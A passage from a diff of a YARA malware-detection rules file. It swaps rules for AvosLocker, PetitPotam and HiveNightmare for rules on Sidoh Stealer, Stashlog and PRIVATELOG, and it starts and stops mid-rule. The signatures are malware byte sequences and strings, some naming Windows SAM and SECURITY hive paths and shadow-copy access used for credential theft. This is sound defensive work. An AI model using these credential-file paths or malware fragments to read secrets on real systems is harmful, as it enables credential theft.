8b 45 f0 48 89 c7 e8 ?? 3d ff ff 83 45 fc 01 83 7d fc 00 74 96 48 8b 05 [2] 20 00 48 89 c7 e8 ?? 3c ff ff 48 8b 05 [2] 20 00 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 e8 48 8b 45 e8 48 89 c7 e8 ?? 3d ff ff c9 c3 55 48 89 e5 48 83 ec 20 48 89 7d e8 48 8b 45 e8 48 89 c7 e8 ?? 3c ff ff 89 c2 8b 05 ?? d0 30 00 01 d0 83 c0 01 89 c7 e8 ?? 91 ff ff 48 89 45 f8 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3c ff ff 48 8b 45 f8 48 c7 c1 ff ff ff ff 48 89 c2 b8 00 00 00 00 48 89 d7 f2 ae 48 89 c8 48 f7 d0 48 8d 50 ff 48 8b 45 f8 48 01 d0 66 c7 00 2f 00 48 8b 15 ?? cf 30 00 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3e ff ff 48 8b 45 f8 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 f0 48 83 7d f0 00 } - $seq4 = { 48 89 e5 48 83 ec 10 c7 45 fc 58 00 00 00 8b 45 fc 48 8d 55 f0 48 89 c6 bf 00 a5 71 00 e8 [2] 00 00 48 89 05 ?? 0b 31 00 48 8d 45 f0 48 89 c2 be 20 00 00 00 bf c0 a4 71 00 e8 [2] 00 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 b7 fd ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 80 fe ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 ?? 0a 31 00 48 c7 05 ?? 0a 31 00 [2] 41 00 e8 ?? f6 ff ff e8 f1 f7 ff ff b8 01 00 00 00 } + $s1 = { 41 57 41 89 cf 41 56 4d 89 c6 41 55 41 89 f5 be 01 00 00 00 41 54 49 89 fc bf 02 00 00 00 55 89 d5 31 d2 53 48 83 ec 38 48 c7 44 24 20 00 00 00 00 48 c7 44 24 28 00 00 00 00 e8 cf bf fe ff be 03 00 00 00 89 c3 89 c7 31 c0 e8 1f c4 fe ff 80 cc 08 be 04 00 00 00 89 df 89 c2 31 c0 e8 0c c4 fe ff 48 8d 74 24 20 89 ea 89 df 66 c1 ca 08 66 89 54 24 22 ba 10 00 00 00 66 c7 44 24 20 02 00 44 89 e8 31 ed 0f c8 89 44 24 24 e8 ae be fe ff 85 c0 0f 84 c5 00 00 00 e8 11 c0 fe ff 83 38 73 48 89 c5 74 07 89 df e8 12 b8 fe ff 8b 6d 00 83 fd 73 0f 85 a5 00 00 00 bf 1c 00 00 00 e8 dc b9 fe ff 48 85 c0 48 89 c2 0f 84 8c 00 00 00 44 89 68 14 89 58 18 4d 8d 6c 24 60 44 89 78 10 41 0f 10 06 4c 89 ef 4d 8d 74 24 50 0f 11 02 0f 29 04 24 48 89 04 24 e8 74 c2 fe ff bf 18 00 00 00 e8 b2 b5 07 00 48 85 c0 74 17 48 8b 14 24 48 c7 00 00 00 00 00 48 c7 40 08 00 00 00 00 48 89 50 10 4c 89 f6 48 89 c7 e8 9b fe 08 00 4c 89 ef e8 0b c3 fe ff 41 8b bc 24 88 00 00 00 48 8d 4c 24 14 89 da be 01 00 00 00 89 5c 24 18 c7 44 24 14 1d 20 00 80 e8 26 bd fe } + $s2 = { 55 31 c0 b9 5d 00 00 00 53 48 89 fb 48 81 ec 48 01 00 00 48 8d 7c 24 4e f3 aa 48 8d 7c 24 4e e8 d2 03 00 00 48 8d bc 24 ab 00 00 00 31 c0 b9 07 00 00 00 48 8d 74 24 28 c7 44 24 30 00 00 00 00 48 c7 44 24 38 00 00 00 00 f3 ab 48 8b 84 24 70 01 00 00 48 8d 7c 24 4e 48 89 44 24 40 48 8d 44 24 30 48 89 44 24 28 e8 36 08 00 00 8b 6c 24 30 85 ed 0f 85 89 00 00 00 48 8b 44 24 40 48 8b 00 48 8b 40 e8 48 39 44 24 38 75 76 48 8d bc 24 c7 00 00 00 31 c0 b9 5d 00 00 00 f3 aa 48 8d bc 24 c7 00 00 00 e8 4d 03 00 00 48 8d bc 24 24 01 00 00 b9 07 00 00 00 89 e8 48 8d 94 24 c7 00 00 00 48 8d 74 24 4e f3 ab 48 8d 7b 18 e8 64 26 00 00 b9 08 00 00 00 48 89 e7 48 8d b4 24 60 01 00 00 f3 a5 48 8d b4 24 c7 00 00 00 89 c2 48 89 df e8 6e fb ff ff 48 8d bc 24 c7 00 00 00 e8 e3 03 00 00 48 8d 7c 24 4e e8 d9 03 00 00 48 81 c4 } + $s3 = { 83 fa 03 0f 86 e6 00 00 00 41 57 41 56 41 55 41 54 49 89 cc 55 48 89 fd 53 48 89 f3 48 83 ec 28 66 8b 46 04 44 8b 76 0c 44 8b 3e 66 89 44 24 0c 66 8b 46 06 45 8d 6e 01 44 89 7c 24 08 44 89 74 24 14 66 89 44 24 0e 8b 46 08 4c 89 ef 89 44 24 10 e8 f4 b3 fe ff 48 89 c2 48 89 44 24 18 4c 89 e9 31 c0 48 89 d7 48 8d 73 10 f3 aa 48 89 d7 4c 89 f1 f3 a4 44 89 fe 48 89 ef e8 9b fa ff ff ff c0 74 07 4c 89 e1 31 d2 eb 4b 66 83 7c 24 0e 03 75 21 48 8b 74 24 18 48 8d 54 24 10 48 89 ef e8 d4 f8 ff ff 84 c0 75 0b e8 ad b9 fe ff 8b 00 85 c0 75 18 0f b7 54 24 0c 8b 4c 24 08 4d 89 e0 8b 74 24 10 48 89 ef e8 e1 f8 ff ff 83 f8 73 74 11 4c 89 e1 89 c2 8b 74 24 08 48 89 ef e8 ff fe ff ff 48 83 } + $s4 = { 48 8d 05 5a 5f 0b 00 48 89 84 24 80 00 00 00 48 8b 05 cf 75 30 00 be 18 00 00 00 bf 01 00 00 00 ff 10 48 85 c0 48 89 84 24 98 00 00 00 0f 84 fa fc ff ff 4c 8d bc 24 98 00 00 00 48 8b 54 24 60 48 8d 35 00 2b 0b 00 31 c0 4c 89 ff e8 2c ef ff ff 85 c0 0f 85 f4 fb ff ff 49 8b b5 f8 0d 00 00 48 85 f6 0f 84 13 09 00 00 31 ed 41 0f b7 86 ac 03 00 00 66 25 20 40 66 83 f8 20 0f 84 03 09 00 00 80 7c 24 78 00 0f 84 01 07 00 00 49 8b 8e 18 02 00 00 49 8b 96 10 02 00 00 4c 8d 46 06 48 8d 35 a6 2a 0b 00 4c 89 ff 31 c0 e8 ce ee ff ff 85 c0 0f 85 96 fb ff ff 41 0f b7 86 ac 03 00 00 4c 8d 25 42 eb 0a 00 66 25 20 40 66 83 f8 20 0f 84 55 0b 00 00 49 83 bd f8 0e 00 00 00 48 8d 05 25 eb 0a 00 74 0e 49 8b 96 30 04 00 00 48 85 d2 48 0f 45 c2 49 8b 95 68 0c 00 00 48 8d 35 07 eb 0a 00 48 85 d2 74 13 80 3a 00 74 0e 49 8b 96 18 04 00 00 48 85 d2 48 0f 45 f2 49 8b 96 50 04 00 00 48 8d 0d e1 ea 0a 00 48 85 d2 48 0f 44 d1 49 89 d3 48 8b 54 24 50 48 8b 52 20 48 85 d2 48 0f 44 d1 49 89 d2 49 8b 95 50 0d 00 00 48 85 d2 74 13 80 3a 00 74 0e 49 8b 96 10 04 00 00 48 85 d2 48 0f 45 ca 41 f6 85 85 15 00 00 02 48 8d 2d 96 ea 0a 00 74 0e 49 8b 96 28 04 00 00 48 85 d2 48 0f 45 ea 49 8b be 20 04 00 00 48 8d 15 78 ea 0a 00 4d 8b 8e 08 04 00 00 4d 8b 86 38 04 00 00 48 89 4c 24 10 48 8b 8c 24 80 00 00 00 48 89 74 24 28 48 8d 35 f6 23 0b 00 48 85 ff 4c 89 5c 24 20 4c 89 54 24 18 48 0f 44 fa 4d 85 c9 48 89 44 24 30 48 89 7c 24 60 48 8b 7c 24 70 4c 0f 44 ca 4d 85 c0 48 89 6c } + $s5 = { 8b 44 24 50 4d 85 ff 4c 89 38 0f 85 12 f8 ff ff e9 dc f9 ff ff 0f 1f 84 00 00 00 00 00 49 83 bd 68 0c 00 00 00 0f 84 bb f7 ff ff 48 8b 05 e3 6f 30 00 49 8b be 18 04 00 00 ff 10 49 8b b5 68 0c 00 00 48 8d 3d ae 26 0b 00 31 c0 49 c7 86 18 04 00 00 00 00 00 00 e8 22 9b 00 00 48 85 c0 49 89 86 18 04 00 00 0f 85 96 f7 ff ff e9 1d f9 ff ff 0f 1f 44 00 00 41 80 bd ea 0e 00 00 00 48 8d 05 01 26 0b 00 48 89 44 24 60 0f 88 2f f6 ff ff 83 fb 07 0f 87 2a 01 00 00 48 8d 05 76 28 0b 00 89 da 48 63 14 90 48 01 d0 ff e0 0f 1f 00 4c 8b 7c 24 50 49 8b 3f e8 e3 fa fe ff 85 c0 0f 85 eb f7 ff ff 49 8b 3f e8 f3 fa fe ff 49 89 47 08 e9 1e f9 ff ff 66 2e 0f 1f 84 00 00 00 00 00 49 8b b6 d0 00 00 00 49 8b bd f0 10 00 00 e8 5d cf 00 00 85 c0 0f 85 91 f9 ff ff 49 8b 86 d8 03 00 00 45 8b 86 98 01 00 00 8b 80 80 00 00 00 a8 02 74 0d 41 81 f8 bb 01 00 00 0f 84 b9 01 00 00 a8 01 74 0a 41 83 f8 50 0f 84 ab 01 00 00 41 0f b6 86 ad 03 00 00 48 8d 0d 2e e7 0a 00 48 8d 15 8a 1c 0b 00 48 8d 3d de 25 0b 00 48 89 ce 83 e0 02 48 8d 05 3c 07 0b 00 48 0f 45 ca 48 8b 54 24 58 48 0f 45 f0 31 c0 e8 14 9a 00 00 49 89 86 38 04 00 00 48 85 c0 0f 85 99 f9 ff ff e9 0f f8 ff ff 48 8d 05 05 25 0b 00 48 89 44 24 60 e9 2f f5 ff ff 48 8d 05 ef 24 0b 00 48 89 44 24 60 e9 1e f5 ff ff 48 8d 05 56 cd 0a 00 48 89 44 24 60 e9 0d f5 ff ff 48 8d 05 d6 24 0b 00 48 89 44 24 60 e9 fc f4 ff ff 48 8d 05 0e d1 0a 00 48 89 44 24 60 e9 eb f4 ff ff 66 2e 0f 1f 84 00 00 00 00 00 49 8b 86 d0 03 00 00 f6 80 80 00 00 00 03 74 28 8d 43 fd 83 f8 01 0f 86 6a 02 00 00 41 f6 85 eb 0e 00 00 01 74 12 49 83 bd f8 14 00 00 ff 0f 84 62 02 00 00 0f 1f 40 00 41 80 a5 68 06 00 00 bf 48 8d 05 44 e6 0a 00 41 f6 85 68 06 00 00 40 48 89 c1 48 8d 05 60 24 0b 00 48 0f 44 c1 48 89 44 24 70 e9 01 f8 ff ff 66 0f 1f 84 00 00 00 00 00 83 7f 18 04 4c 8d 3d f3 0a 0b 00 } condition: - uint32(0)==0x464c457f and filesize >50KB and 3 of ($seq*) + uint32(0)==0x464c457f and filesize >100KB and 4 of ($s*) } rule ARKBIRD_SOLG_MAL_Polazert_Apr_2021_1 : FILE { @@ -198795,531 +200645,540 @@ rule ARKBIRD_SOLG_MAL_Polazert_Apr_2021_1 : FILE condition: uint16(0)==0x5a4d and filesize >15KB and 3 of them } -rule ARKBIRD_SOLG_RAN_Avoslocker_July_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Sidoh_Stealer_Aug_2021_1 : FILE { meta: - description = "Detect AvosLocker ransomware" + description = "Detect Sidoh Stealer used by RYUK group" author = "Arkbird_SOLG" - id = "3fbc707f-9802-54bc-933b-bc4c4953b1d0" - date = "2021-07-23" - modified = "2021-07-24" - reference = "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/AvosLocker/RAN_AvosLocker_July_2021_1.yara#L1-L23" + id = "b4661304-6dfa-5c33-95f2-8694271b9e58" + date = "2021-08-31" + modified = "2021-09-01" + reference = "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-31/Sidoh/MAL_Sidoh_Stealer_Aug_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "e2291f574b5ab68e901a76b6511e0ee4c1eee51d5e3eced62bf68ceedb061958" + logic_hash = "baeea14c6be42d64d3ca68298bf6ced34c9587fcda91471945cfc7ed1fe267bd" score = 75 quality = 75 tags = "FILE" - hash1 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856" - hash2 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f" - tlp = "white" - adversary = "-" + hash1 = "a1ce52437252001b56c9ccd2d2da46240dc38db8074a5ed39a396e8c8e387fc2" + hash2 = "c64269a64b64b20108df89c4f1a415936c9d9923f8761d0667aa8492aa057acb" + hash3 = "e6762cb7d09cd90d5469e3c3bfc3b47979cd67aa06c06e893015a87b0348c32c" + hash4 = "cc4a0b4080844e20fb9535679f7b09a3e2449729ce1815d1e5a64272b0225465" + tlp = "White" + adversary = "RYUK (RAAS)" strings: - $s1 = { 64 72 69 76 65 20 25 73 20 74 6f 6f 6b 20 25 66 20 73 65 63 6f 6e 64 73 0a 00 00 00 25 63 3a 00 64 72 69 76 65 3a 20 25 73 } - $s2 = { 63 6c 69 65 6e 74 5f 72 73 61 5f 70 72 69 76 3a 20 25 73 0a } - $s3 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 2d 2d 2d 2d 2d 45 4e 44 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d } - $s4 = { ff 35 b8 2c 46 00 88 9d 7c ef ff ff e8 3c 56 02 00 50 8d 85 71 ef ff ff 50 e8 c5 9e ff ff 83 c4 0c 8d 85 94 ef ff ff 50 53 53 68 14 01 00 00 ff 35 b8 2c 46 00 ff b5 90 ef ff ff ff 15 00 a0 44 00 85 c0 0f 85 cd 00 00 00 8b 35 48 a0 44 00 8d 85 98 fe ff ff 53 68 ff 00 00 00 50 68 00 04 00 00 ff d6 50 53 68 00 10 00 00 ff 15 44 a0 44 00 b1 3e c7 85 70 ef ff ff 3e 7b 6c 6c c7 85 74 ef ff ff 71 6c 04 1e 8b c3 c7 85 78 ef ff ff 1b 4d 34 00 30 8c 05 71 ef ff ff 40 83 f8 0a 73 08 8a 8d 70 ef ff ff eb eb 8d 85 98 fe ff ff 88 9d 7b ef ff ff 50 8d 85 71 ef ff ff 50 e8 23 9e ff ff 0f 28 05 00 8b 45 00 59 0f 11 85 48 ef ff ff 59 0f 28 05 40 8b 45 00 8b cb 0f 11 85 58 ef ff ff 66 c7 } - $s5 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 a6 ca ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 48 a1 44 00 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b } - $s6 = { 4d 61 70 3a 20 25 73 0a 00 00 00 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6e 00 67 00 20 00 25 00 6c 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 } - $s7 = { 44 6f 6e 65 21 21 0a 00 25 66 20 73 65 63 6f 6e 64 73 0a } - $s8 = { 56 68 01 00 00 08 6a 01 52 ff 15 14 a0 44 00 85 c0 0f 84 97 00 00 00 8d 45 f8 50 53 53 6a 06 53 ff 36 8b 1d 20 a0 44 00 ff d3 85 c0 74 73 ff 75 f8 e8 3b a7 01 00 a3 b8 2c 46 00 59 85 c0 } + $s1 = { 68 88 13 00 00 ff 15 ?? 30 41 00 ff 76 04 ff 15 ?? 30 41 00 68 10 27 00 00 53 68 ?? f6 41 00 e8 ?? ?? 00 00 83 c4 0c ff 15 ?? 30 41 00 8b f8 8b f3 8b d7 8b ce d3 ea f6 c2 01 74 34 8d 46 41 6a 3a 66 a3 ?? f6 41 00 58 66 a3 ?? f6 41 00 33 c0 68 ?? f6 41 00 66 a3 ?? f6 41 00 ff 15 ?? 30 41 00 83 f8 05 74 0a b9 ?? f6 41 00 e8 ?? ?? 00 00 46 83 fe 1a 7c bb 68 10 27 00 00 53 68 ?? f6 41 00 e8 ?? ?? 00 00 8b 3d ?? 30 41 00 8d 44 24 28 83 c4 0c 89 5c 24 1c 6a 01 50 53 ff d7 8b 35 ?? 30 41 00 6a 04 68 00 10 00 00 ff 74 24 24 53 ff d6 8b d8 8d 44 24 1c 6a 01 50 53 89 5c 24 30 ff d7 6b 0b 18 6a 04 68 00 10 00 00 51 33 c9 51 ff d6 68 00 40 00 00 6a 40 89 44 24 38 ff 15 ?? 30 41 00 33 f6 89 44 24 2c 89 74 24 } + $s2 = { 8b ca c1 e9 02 f3 a5 8b ca 83 e1 03 f3 a4 33 f6 56 56 56 6a 01 56 ff 15 ?? 31 41 00 a3 ?? ?? 42 00 8b fe 85 c0 74 4e 56 68 00 00 00 08 6a 01 68 ?? ?? 41 00 68 ?? ec 41 00 6a 15 ff 75 f8 50 ff 15 ?? 31 41 00 8b f8 85 ff 74 42 56 6a 02 8d 85 f0 fc ff ff 50 53 57 ff 15 ?? 31 41 00 85 c0 75 0f ff 15 ?? 30 41 00 8b d8 a1 ?? ?? 42 00 eb 08 a1 ?? ?? 42 00 33 db 43 8b 35 ?? 31 41 00 50 ff d6 57 ff d6 8b c3 5f 5e 5b 8b e5 } + $s3 = { 55 8b ec 83 ec 58 53 8b 1d ?? 30 41 00 56 57 6a 04 68 00 10 00 00 6a 02 6a 00 89 55 f0 8b f1 ff d3 8b f8 85 ff 75 08 83 c8 ff e9 0f 01 00 00 56 68 ?? ?? 41 00 57 e8 93 ff ff ff 83 65 f8 00 8d 45 f8 50 6a 00 57 ff 15 ?? 31 41 00 83 c4 18 8b f0 83 7d f8 00 89 75 f4 74 04 6a fd eb 33 83 65 ac 00 8d 45 ac 50 ff 15 ?? 31 41 00 8d 45 ac 50 6a 00 68 ?? ?? 41 00 56 ff 15 ?? 31 41 00 83 c4 14 83 7d c8 00 77 10 72 06 } + $s4 = { 6a 04 68 00 10 00 00 ff 75 c4 6a 00 ff d3 8b d8 85 db 75 1a 68 00 80 00 00 50 57 ff 15 ?? 30 41 00 56 ff 15 ?? 31 41 00 59 6a fb 58 eb 79 6a 00 68 ?? ?? 41 00 56 ff 15 ?? 31 41 00 ff 75 c8 8b f0 ff 75 c4 53 56 ff 15 ?? 31 41 00 56 ff 15 ?? 31 41 00 ff 75 f4 ff 15 ?? 31 41 00 ff 75 08 8b 55 c4 8b cb ff 75 f0 e8 3b 02 00 00 8b f0 83 c4 2c 85 f6 75 14 83 7d 08 05 75 0e 8b 55 c4 51 8b cb e8 b3 09 00 00 59 8b f0 68 00 80 00 00 6a 00 53 ff 15 ?? 30 41 00 68 00 80 00 00 6a 00 57 ff 15 ?? 30 41 00 8b c6 5f 5e 5b 8b e5 } condition: - uint16(0)==0x5A4D and filesize >50KB and 6 of ($s*) + uint16(0)==0x5A4D and filesize >20KB and all of ($s*) } -rule ARKBIRD_SOLG_Exp_Petitpotam_July_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Stashlog_Sep_2021_1 : FILE { meta: - description = "Detect PetitPotam exploit (local exploit version)" + description = "Detect Stashlog malware" author = "Arkbird_SOLG" - id = "dd23c77d-9929-5130-aad8-2bcc0a7dcbaa" - date = "2021-07-23" - modified = "2021-07-24" - reference = "https://github.com/topotam/PetitPotam" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/PetitPotam/Exp_PetitPotam_July_2021_1.yara#L1-L24" + id = "a6ae59df-c45a-5a31-8530-4fd7f0f33f93" + date = "2021-09-01" + modified = "2021-09-05" + reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_Stashlog_Sep_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "a33a1dc2a3593063de2b65e01a770ff5c72ad360d88efdca588eacb8817fb91d" - score = 75 - quality = 69 + logic_hash = "6bde398a0f13674e72fcbd9809d22773bc1fe699f7c187775740d50910b07d5b" + score = 50 + quality = 75 tags = "FILE" - hash1 = "10cbadc2c82178d3b7bdf96ab39b9e8580ee92c2038728b74d314e506c7a9144" - tlp = "white" + hash1 = "720610b9067c8afe857819a098a44cab24e9da5cf6a086351d01b73714afd397" + hash2 = "869165044402a5f82f4cb8ddd51663ebb05f86345f346f765dcc54b20706cf7c" + level = "experimental" + tlp = "White" adversary = "-" strings: - $s1 = "\\pipe\\lsarpc" fullword wide - $s2 = { 5c 00 5c 00 25 00 73 00 5c 00 [4-12] 5c 00 [4-12] 00 2e 00 65 00 78 00 65 } - $s3 = { 5c 00 5c 00 25 00 73 00 00 00 00 00 6e 00 63 00 61 00 63 00 6e 00 5f 00 6e 00 70 } - $s4 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a } - $s5 = { 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 61 6c 6c 6f 63 61 74 69 6f 6e 20 66 61 69 6c 75 72 65 20 61 74 20 66 69 6c 65 20 25 68 73 20 6c 69 6e 65 20 25 64 } - $s6 = { 50 e8 06 95 ff ff 83 c4 10 c7 85 00 ff ff ff 00 00 00 00 8b 85 00 ff ff ff 50 8d 8d 0c ff ff ff 51 8d 55 dc 52 8b 45 f4 50 e8 4e 7a ff ff 83 c4 10 89 45 e8 83 7d } - $s7 = "Attack success!!!\n" fullword wide - $s8 = { 8b 43 0c 56 83 e8 24 8d 73 20 50 56 8d 45 b4 50 8d 45 e8 50 e8 02 02 00 00 68 b8 52 4f 00 8d 45 b4 50 68 bc 52 4f 00 8d 45 e8 50 8b 43 0c 68 c0 52 4f 00 ff 75 10 83 e8 24 68 cc 52 4f 00 50 68 00 53 4f 00 56 68 0c 53 4f 00 68 20 53 4f 00 68 78 53 4f 00 8d 85 c0 fe ff ff 68 f4 00 00 00 50 e8 4e 91 ff ff 83 c4 4c 8d 85 c0 fe ff ff 50 6a 04 } - $s9 = { 25 73 25 73 25 70 25 73 25 7a 64 25 73 25 64 25 73 25 73 25 73 25 73 25 73 } - $s10 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 00 20 00 3a 00 20 00 25 00 6c 00 73 } + $s1 = "497E724A7BA2764BB4570B225601FB693A796873E7847DB943F7FE9E7281C91A443DF1F8519CBB25FC736CC65BF3DE67A82E704BEB698E17" fullword ascii + $s2 = { 50 83 ec 0c 89 e0 31 c9 89 48 04 89 08 89 48 0c 89 48 08 50 ff 15 1c b2 42 00 c7 05 38 ac 44 00 01 00 00 00 50 83 ec 0c 89 e7 81 ec 04 01 00 00 31 c0 89 e3 89 47 04 89 07 89 47 0c 89 47 08 57 ff 15 1c b2 42 00 ff 25 64 5f 43 00 ff 25 6c 5f 43 00 0f b6 4f 0e 0f b6 47 0f 0f b6 57 0d 89 4d dc 0f b6 4f 0c 89 45 d8 89 55 e0 89 4d e4 ff 25 7c 5f 43 00 8b 4d f0 31 f6 46 31 e9 e8 94 48 01 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 ff 25 34 5f 43 00 0f 10 05 08 30 43 00 0f 10 0d 18 30 43 00 a0 28 30 43 00 8a 15 29 30 43 00 8a 0d 2a 30 43 00 0f 57 05 80 b2 42 00 0f 57 0d 90 b2 42 00 34 e9 80 f2 10 80 f1 b3 0f 11 } + $s3 = { 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 31 c0 66 c7 84 24 ae 00 00 00 3a 00 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 ff 25 e8 a9 43 00 89 c7 31 c0 83 ff ff 0f 94 c0 ff 24 85 ec a9 43 00 c7 44 24 1c 00 00 00 00 ff 25 28 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f 29 44 24 60 0f 29 44 24 50 0f 29 44 24 40 0f 29 44 24 30 ff 25 30 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f } + $s4 = { a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 ff 25 68 1f 44 00 89 cb ff 25 70 1f 44 00 31 c9 85 c0 8b 06 8b 5e 0c 0f } + $s5 = { 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 89 c6 ff 25 70 b7 43 00 ff 37 ff 15 0c b0 42 00 8b 4d f0 31 e9 e8 a9 f6 00 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 ff 25 48 b7 43 00 55 } condition: - uint16(0)==0x5A4D and filesize >50KB and 7 of ($s*) + uint16(0)==0x5A4D and filesize >20KB and 4 of ($s*) } -rule ARKBIRD_SOLG_Exp_CVE_2021_36934_July_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_PRIVATELOG_Sep_2021_1 : FILE { meta: - description = "Detect CVE_2021_36934 exploit (HiveNightmare)" + description = "Detect PRIVATELOG malware" author = "Arkbird_SOLG" - id = "3a0ed4f7-8a99-569f-a636-4cd64c2121bb" - date = "2021-07-23" - modified = "2021-07-23" - reference = "https://github.com/GossiTheDog/HiveNightmare" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/HiveNightmare/Exp_CVE_2021_36934_July_2021_1.yara#L1-L23" + id = "fa122d77-0bac-5836-85fd-b096660f7412" + date = "2021-09-01" + modified = "2021-09-05" + reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_PRIVATELOG_Sep_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "2fd6cdf8a81f239473716d2c10a1754ebb2c60099eebd9d0cc1450ad3441075b" - score = 75 - quality = 48 + logic_hash = "4df78bc3005c67d467a0999751bf4fb42ff9075f1601d51ab3b2b88e5dc38f6e" + score = 50 + quality = 50 tags = "FILE" - hash1 = "0009d4950559b508353b951a314c5ac0aaae8161751017d3d4681dc805374eaa" - hash2 = "7baab69f86b50199456c9208624dd16aeb0d18d8a6f2010ee6501a183476f12f" - hash3 = "9035f88894a937892c63ac9a3c6c16301c7ecea7c11cf31d0fd24c39f17c8c2f" - tlp = "white" + hash1 = "1e53559e6be1f941df1a1508bba5bb9763aedba23f946294ce5d92646877b40c" + hash2 = "b9d4ec771a79f53a330b29ed17f719dac81a4bfe11caf0eac0efacd19d14d090" + level = "experimental" + tlp = "White" adversary = "-" strings: - $s1 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" fullword wide - $s2 = "Windows\\System32\\config\\SECURITY" fullword wide - $s3 = "Windows\\System32\\config\\SYSTEM" fullword wide - $s4 = "Windows\\System32\\config\\SAM" fullword wide - $s5 = "SECURITY-" fullword wide - $s6 = { 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 53 45 43 55 52 49 54 59 20 3a } - $s7 = { 7a d1 3f 99 5c 2d 21 79 f2 21 3d 00 58 ac 30 7a b5 d1 3f 7e 84 ff 62 3e cf 3d 3d } + $s1 = { 41 89 d0 48 83 ec 20 4c 89 f1 31 d2 e8 cb 8c 00 00 48 83 ec 10 48 89 5c 24 20 48 8d 15 4b 03 02 00 48 c7 c1 02 00 00 80 45 31 c0 41 b9 19 01 02 00 ff 15 55 52 01 00 48 83 c4 30 89 c7 85 c0 75 5a 49 8d 46 02 48 8b 0b 48 83 ec 30 48 89 74 24 28 48 89 44 24 20 48 8d 15 4f 03 02 00 45 31 c0 45 